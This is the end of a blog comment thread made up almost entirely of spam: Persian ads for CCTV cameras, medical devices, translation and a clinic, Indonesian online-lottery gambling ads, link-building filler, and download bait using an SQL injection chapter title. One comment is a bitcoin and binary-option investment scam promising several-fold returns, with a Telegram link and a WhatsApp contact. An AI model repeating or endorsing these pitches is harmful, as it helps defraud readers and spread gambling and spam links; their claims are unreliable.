    است که علاوه بر عرضه ی انواع دستگاه های پزشکی زیبایی پوست و مو، برگزار کننده ی دوره های آموزشی کار با دستگاه های پزشکی نیز می باشد. برای اطلاع از جدید ترین دستگاه های ما و دریافت مشاوره ی رایگان خرید از سایت ما دیدن فرمایید
    http://tajhizmed.ir

    ReplyDelete
  42. It is common to discover a consummate Anti Aging at a Botox treatment store. Straight from the heart, what I have is a pleasure center apropos to Botox treatment. If you are using Anti Aging then that is for you. This is a sign of things to come. I can't say for certain if it will make a big difference but Anti Aging certainly can't hurt.
    https://www.nutraplatform.com/

    ReplyDelete
  43. گاهی اوقات ممکن است نتوانید مطلب دلخواه خود را در میان سایت های فارسی زبان پیدا کنید. در این حالت مجبور به جستجو مطلب مورد نظرتان در سایت های خارجی باشید. برای ترجمه سایت از سایت ترجمه آنلاین سفارش ترجمه
    بدهید. آیا به دنبال ترجمه مقاله
    مقاله حرفه ای و تضمین شده برای ارسال به ژورنال میگردید؟ سایت ترجمه
    آنلاین دارای کادری حرفه ای میباشد که به کمک شما می آید. آیا دانشجوی رشته مدیریت هستید و به دنبال ترجمه تخصصی مدیریت
    می گردید؟ آیا دانشجو رشته روانشناسی هستید و به دنبال ترجمه تخصصی روانشناسی
    می گردید؟

    ReplyDelete
  44. sangat membantu sekali infonya

    http://www.juntafmangualde.org/ Situs Agen Togel Online Terpercaya Dengan Pasaran Paling Lengkap

    ReplyDelete
  45. Ayo bergabung di situs bandar togel indonesia resmi deposit 10rb langsung dapat bonus 100rb untuk semua member tanpa syarat ribet. Dijamin untung pakai trik menang togel 2 angka. Untuk informasi lebih lanjut langsung saja kunjungi blog unsurtoto http://sequoyahranch.com

    ReplyDelete
  46. BITCOIN MINER:

    Life ends when you stop dreaming, hope ends when you stop believing, love ends when you stop caring and showing kindness. So dream, work hard, believe and you will achieve whatever your heart desires. Binary option is an opportunity to make your dreams come true. It's all about investing on the right platform and watch your funds grow massively. The rules of engagement are very simple, the procedures are easy and the profits are massive.

    Invest📈 $50 and withdraw $200.
    Invest📈$100 and withdraw $300.
    Invest📈 $200 and withdraw $600.
    Invest📈$500 and withdraw $1500.
    Invest📈$1000 and withdraw $5000, and the list continues.

    Invest with:
    https://t.me/bitcoinbtcearningbot

    Contact me on WhatsApp If you need any assistance: +15594256844

    ReplyDelete
  47. پخش مداربسته وای فای
    پخش مداربسته وای فای
    خرید دوربین مدار بسته مخفی
    خرید مداربسته آی پی
    فروش مداربسته آی پی
    قیمت مداربسته آی پی
    نصب مداربسته آی پی
    فروش دوربین مدار بسته مخفی
    قیمت دوربین مداربسته مخفی
    نصب دوربین مداربسته مخفی
    پخش دوربین مدار بسته مخفی
    پخش دوربین مدار بسته
    پخش دوربین مداربسته اچ دی
    پخش دوربین مدار بسته hd
    پخش دوربین مدار بسته آی پی
    فروش دوربین مداربسته آی پی
    قیمت دوربین مداربسته آی پی
    خرید دوربین مداربسته آی پی
    نصب دوربین مداربسته اچ دی
    نصب دوربین مداربسته آی پی
    پخش دوربین مدار بسته ip
    پخش دوربین مدار بسته وای فای
    قیمت دوربین مداربسته آنالوگ
    نصب دوربین مداربسته آنالوگ
    پخش دوربین مداربسته آنالوگ
    پخش دوربین مدار بسته wifi
    فروش دوربین مداربسته آنالوگ
    پخش دوربین مدار بسته مخفی
    لیست قیمت دوربین مدار بسته
    خرید دوربین مدار بسته wifi
    فروش دوربین مدار بسته wifi
    دوربین آی پی
    دوربین wifi
    دوربین مدار بسته بیسیم
    پکیج دوربین مداربسته
    خرید دوربین مداربسته wireless
    فروش دوربین مداربسته wireless
    قیمت دوربین مداربسته wireless
    نصب دوربین مداربسته wireless
    پخش دوربین مداربسته wireless
    دوربین مدار بسته
    دوربین مداربسته آنالوگ
    دوربین مداربسته ارزان
    خرید دوربین مدار بسته آنالوگ
    فروش دوربین مداربسته آنالوگ
    قیمت دوربین مدار بسته آنالوگ
    نصب دوربین مدار بسته آنالوگ
    پخش دوربین مدار بسته آنالوگ

    ReplyDelete
  48. دوربین مدار بسته
    مدار بسته
    دوربین مداربسته
    دوربین مدار بسته آی پی
    دوربین مداربسته آی پی
    دوربین مدار بسته ip
    خرید دوربین مدار بسته آی پی
    فروش دوربین مدار بسته آی پی مجموعه لینکهای dtexx.com/cat/cctv/ip/
    قیمت دوربین مدار بسته آی پی
    نصب دوربین مدار بسته آی پی
    پخش دوربین مدار بسته آی پی







    دوربین مدار بسته
    دوربین مداربسته
    مداربسته
    دوربین مدار بسته وایرلس
    خرید دوربین مدار بسته وایرلس
    فروش دوربین مدار بسته وایرلس
    قیمت دوربین مداربسته وایرلس
    نصب دوربین مدار بسته وایرلس
    پخش دوربین مداربسته وایرلس
    دوربین مدار بسته وای فای
    مدار بسته وای فای مجموعه لینکهای صفحه dtexx.com/cat/cctv/wireless/
    دوربین مدار بسته وای فای
    خرید دوربین مدار بسته وای فای
    فروش دوربین مدار بسته وای فای
    قیمت دوربین مدار بسته وای فای
    نصب دوربین مدار بسته وای فای
    پخش دوربین مدار بسته وای فای






    قیمت دوربین مداربسته وایرلس
    فروش پکیج دوربین مداربسته وایرلس صفحه پکیج دوربین مداربسته
    خرید پکیج دوربین مداربسته
    پکیج دوربین مداربسته
    پکیج دوربین مداربسته بیسیم
    پک دوربین مدار بسته
    پک دوربین مداربسته ارزان

    ReplyDelete
  49. دوربین مدار بسته آنالوگ
    خرید دوربین مدار بسته آنالوگ
    فروش دوربین مدار بسته آنالوگ
    قیمت دوربین مدار بسته آنالوگ


    دوربین مدار بسته
    خرید دوربین مدار بسته wifi
    فروش دوربین مدار بسته wifi
    قیمت دوربین مدار بسته wifi مجموعه لینکهای کتگوری دوربین وایرلس cat/cctv/wireless/
    مدار بسته
    نصب دوربین مدار بستهwifi
    پخش دوربین مدار بسته wifi
    دورین مدار بسته وای فای
    دوربین مداربسته وایرلس
    خرید مداربسته وای فای
    فروش مداربسته وای فای
    قیمت مداربسته وای فای
    نصب مداربسته وای فای
    مداربسته وایرلس
    مداربسته وای فای
    دوربین مداربسته wifi




    دوربین مدار بسته
    مدار بسته
    خرید دوربین مدار بسته اچ دی مجموعه لینکهای کتگوری /cat/cctv/hd/
    فروش دوربین مدار بسته hd
    قیمت دوربین مدار بسته اچ دی
    قیمت دورین مداربسته اچ دی
    دوربین مدار بسته اچ دی
    فروش دوربین مداربسته اچ دی
    خرید دوربین مداربسته hd
    قیمت دوربین مداربسته hd
    نصب دوربین مداربسته hd
    پخش دوربین مداربسته hd
    خرید مداربسته اچ دی
    قیمت مداربسته اچ دی
    دوربین مداربسته اچ دی

    ReplyDelete
  50. دوربین مدار بسته
    دوربین مداربسته اچ دی
    مدار بسته
    خرید دوربین مدار بسته اچ دی
    فروش دوربین مدار بسته اچ دی مجموعه لینکهای صفحه دوربین-مداربسته-hd-چیست؟/
    دوربین مدار بسته hd
    قیمت دوربین مدار بسته اچ دی
    نصب دوربین مدار بسته اچ دی
    پخش دوربین مدار بسته اچ دی
    پخش مداربسته اچ دی
    فروش مداربسته اچ دی
    نصب مداربسته اچ دی
    پخش مداربسته اچ دی
    مداربسته اچ دی
    دوربین مداربسته فول اچ دی
    پکیج دوربین مداربسته



    دوربین مدار بسته
    مدار بسته
    دوربین مداربسته
    دوربین مدار بسته آی پی
    دوربین مداربسته آی پی
    دوربین مدار بسته ip
    خرید دوربین مدار بسته آی پی
    فروش دوربین مدار بسته آی پی مجموعه لینکهای dtexx.com/cat/cctv/ip/
    قیمت دوربین مدار بسته آی پی
    نصب دوربین مدار بسته آی پی
    پخش دوربین مدار بسته آی پی







    دوربین مدار بسته
    دوربین مداربسته
    مداربسته
    دوربین مدار بسته وایرلس
    خرید دوربین مدار بسته وایرلس
    فروش دوربین مدار بسته وایرلس
    قیمت دوربین مداربسته وایرلس
    نصب دوربین مدار بسته وایرلس
    پخش دوربین مداربسته وایرلس
    دوربین مدار بسته وای فای
    مدار بسته وای فای مجموعه لینکهای صفحه dtexx.com/cat/cctv/wireless/
    دوربین مدار بسته وای فای
    خرید دوربین مدار بسته وای فای
    فروش دوربین مدار بسته وای فای
    قیمت دوربین مدار بسته وای فای
    نصب دوربین مدار بسته وای فای
    پخش دوربین مدار بسته وای فای


    ReplyDelete

  51. دارو کلیک یک فروشگاه اینترنتی محصولات بهداشتی و زیبایی به همراه تجهیزات پزشکی و محصولات ارتوپدی می باشد که باهدف تمرکز بر بالاترین کیفیت خدمات دهی به مشتریان و بهترین قیمت در ارائه ی محصولات ایجاد شد است. جهت درسترسی به فروشگاه از لینک زیر استفاده کنید.
    داروکلیک | داروخانه اینترنتی | ارسال به سراسر ایران (daruclick.com)

    شامپو مناسب موهای چرب - داروکلیک (daruclick.com)

    ReplyDelete
  52. طراحی سایت در کرج با گروه وبری و همراه طراحی کارهای گرافیکی به شکل رایگان

    ReplyDelete
  53. برترین مرکز درمان بیماری های نشیمنگاه با تجهیزات مدرن و روز دنیا همراه با مشاوره کاملا رایگان قبل و بعد از عمل برای تمامی افراد و حتی کسانی که بیمار نیستند.در مدت 20 دقیقه از دست بیماری خود خلاص شوید
    مرکز لیزر بیماری های نشیمنگاه - کلینیک پارادایس

    ReplyDelete
  54. thi is a test for link building software that used to nounce this website.this is a quality link

    ReplyDelete
  55. Thanks for offering us such a useful details. Keep up the great work. You can also check out this awarded Vitamin supplement store for nutritional supplements from leading brands. Nutritional Supplement Store

    ReplyDelete
  56. Chapter2: Basic Sql Injection With Login Queries >>>>> Download Now

    >>>>> Download Full

    Chapter2: Basic Sql Injection With Login Queries >>>>> Download LINK

    >>>>> Download Now

    Chapter2: Basic Sql Injection With Login Queries >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete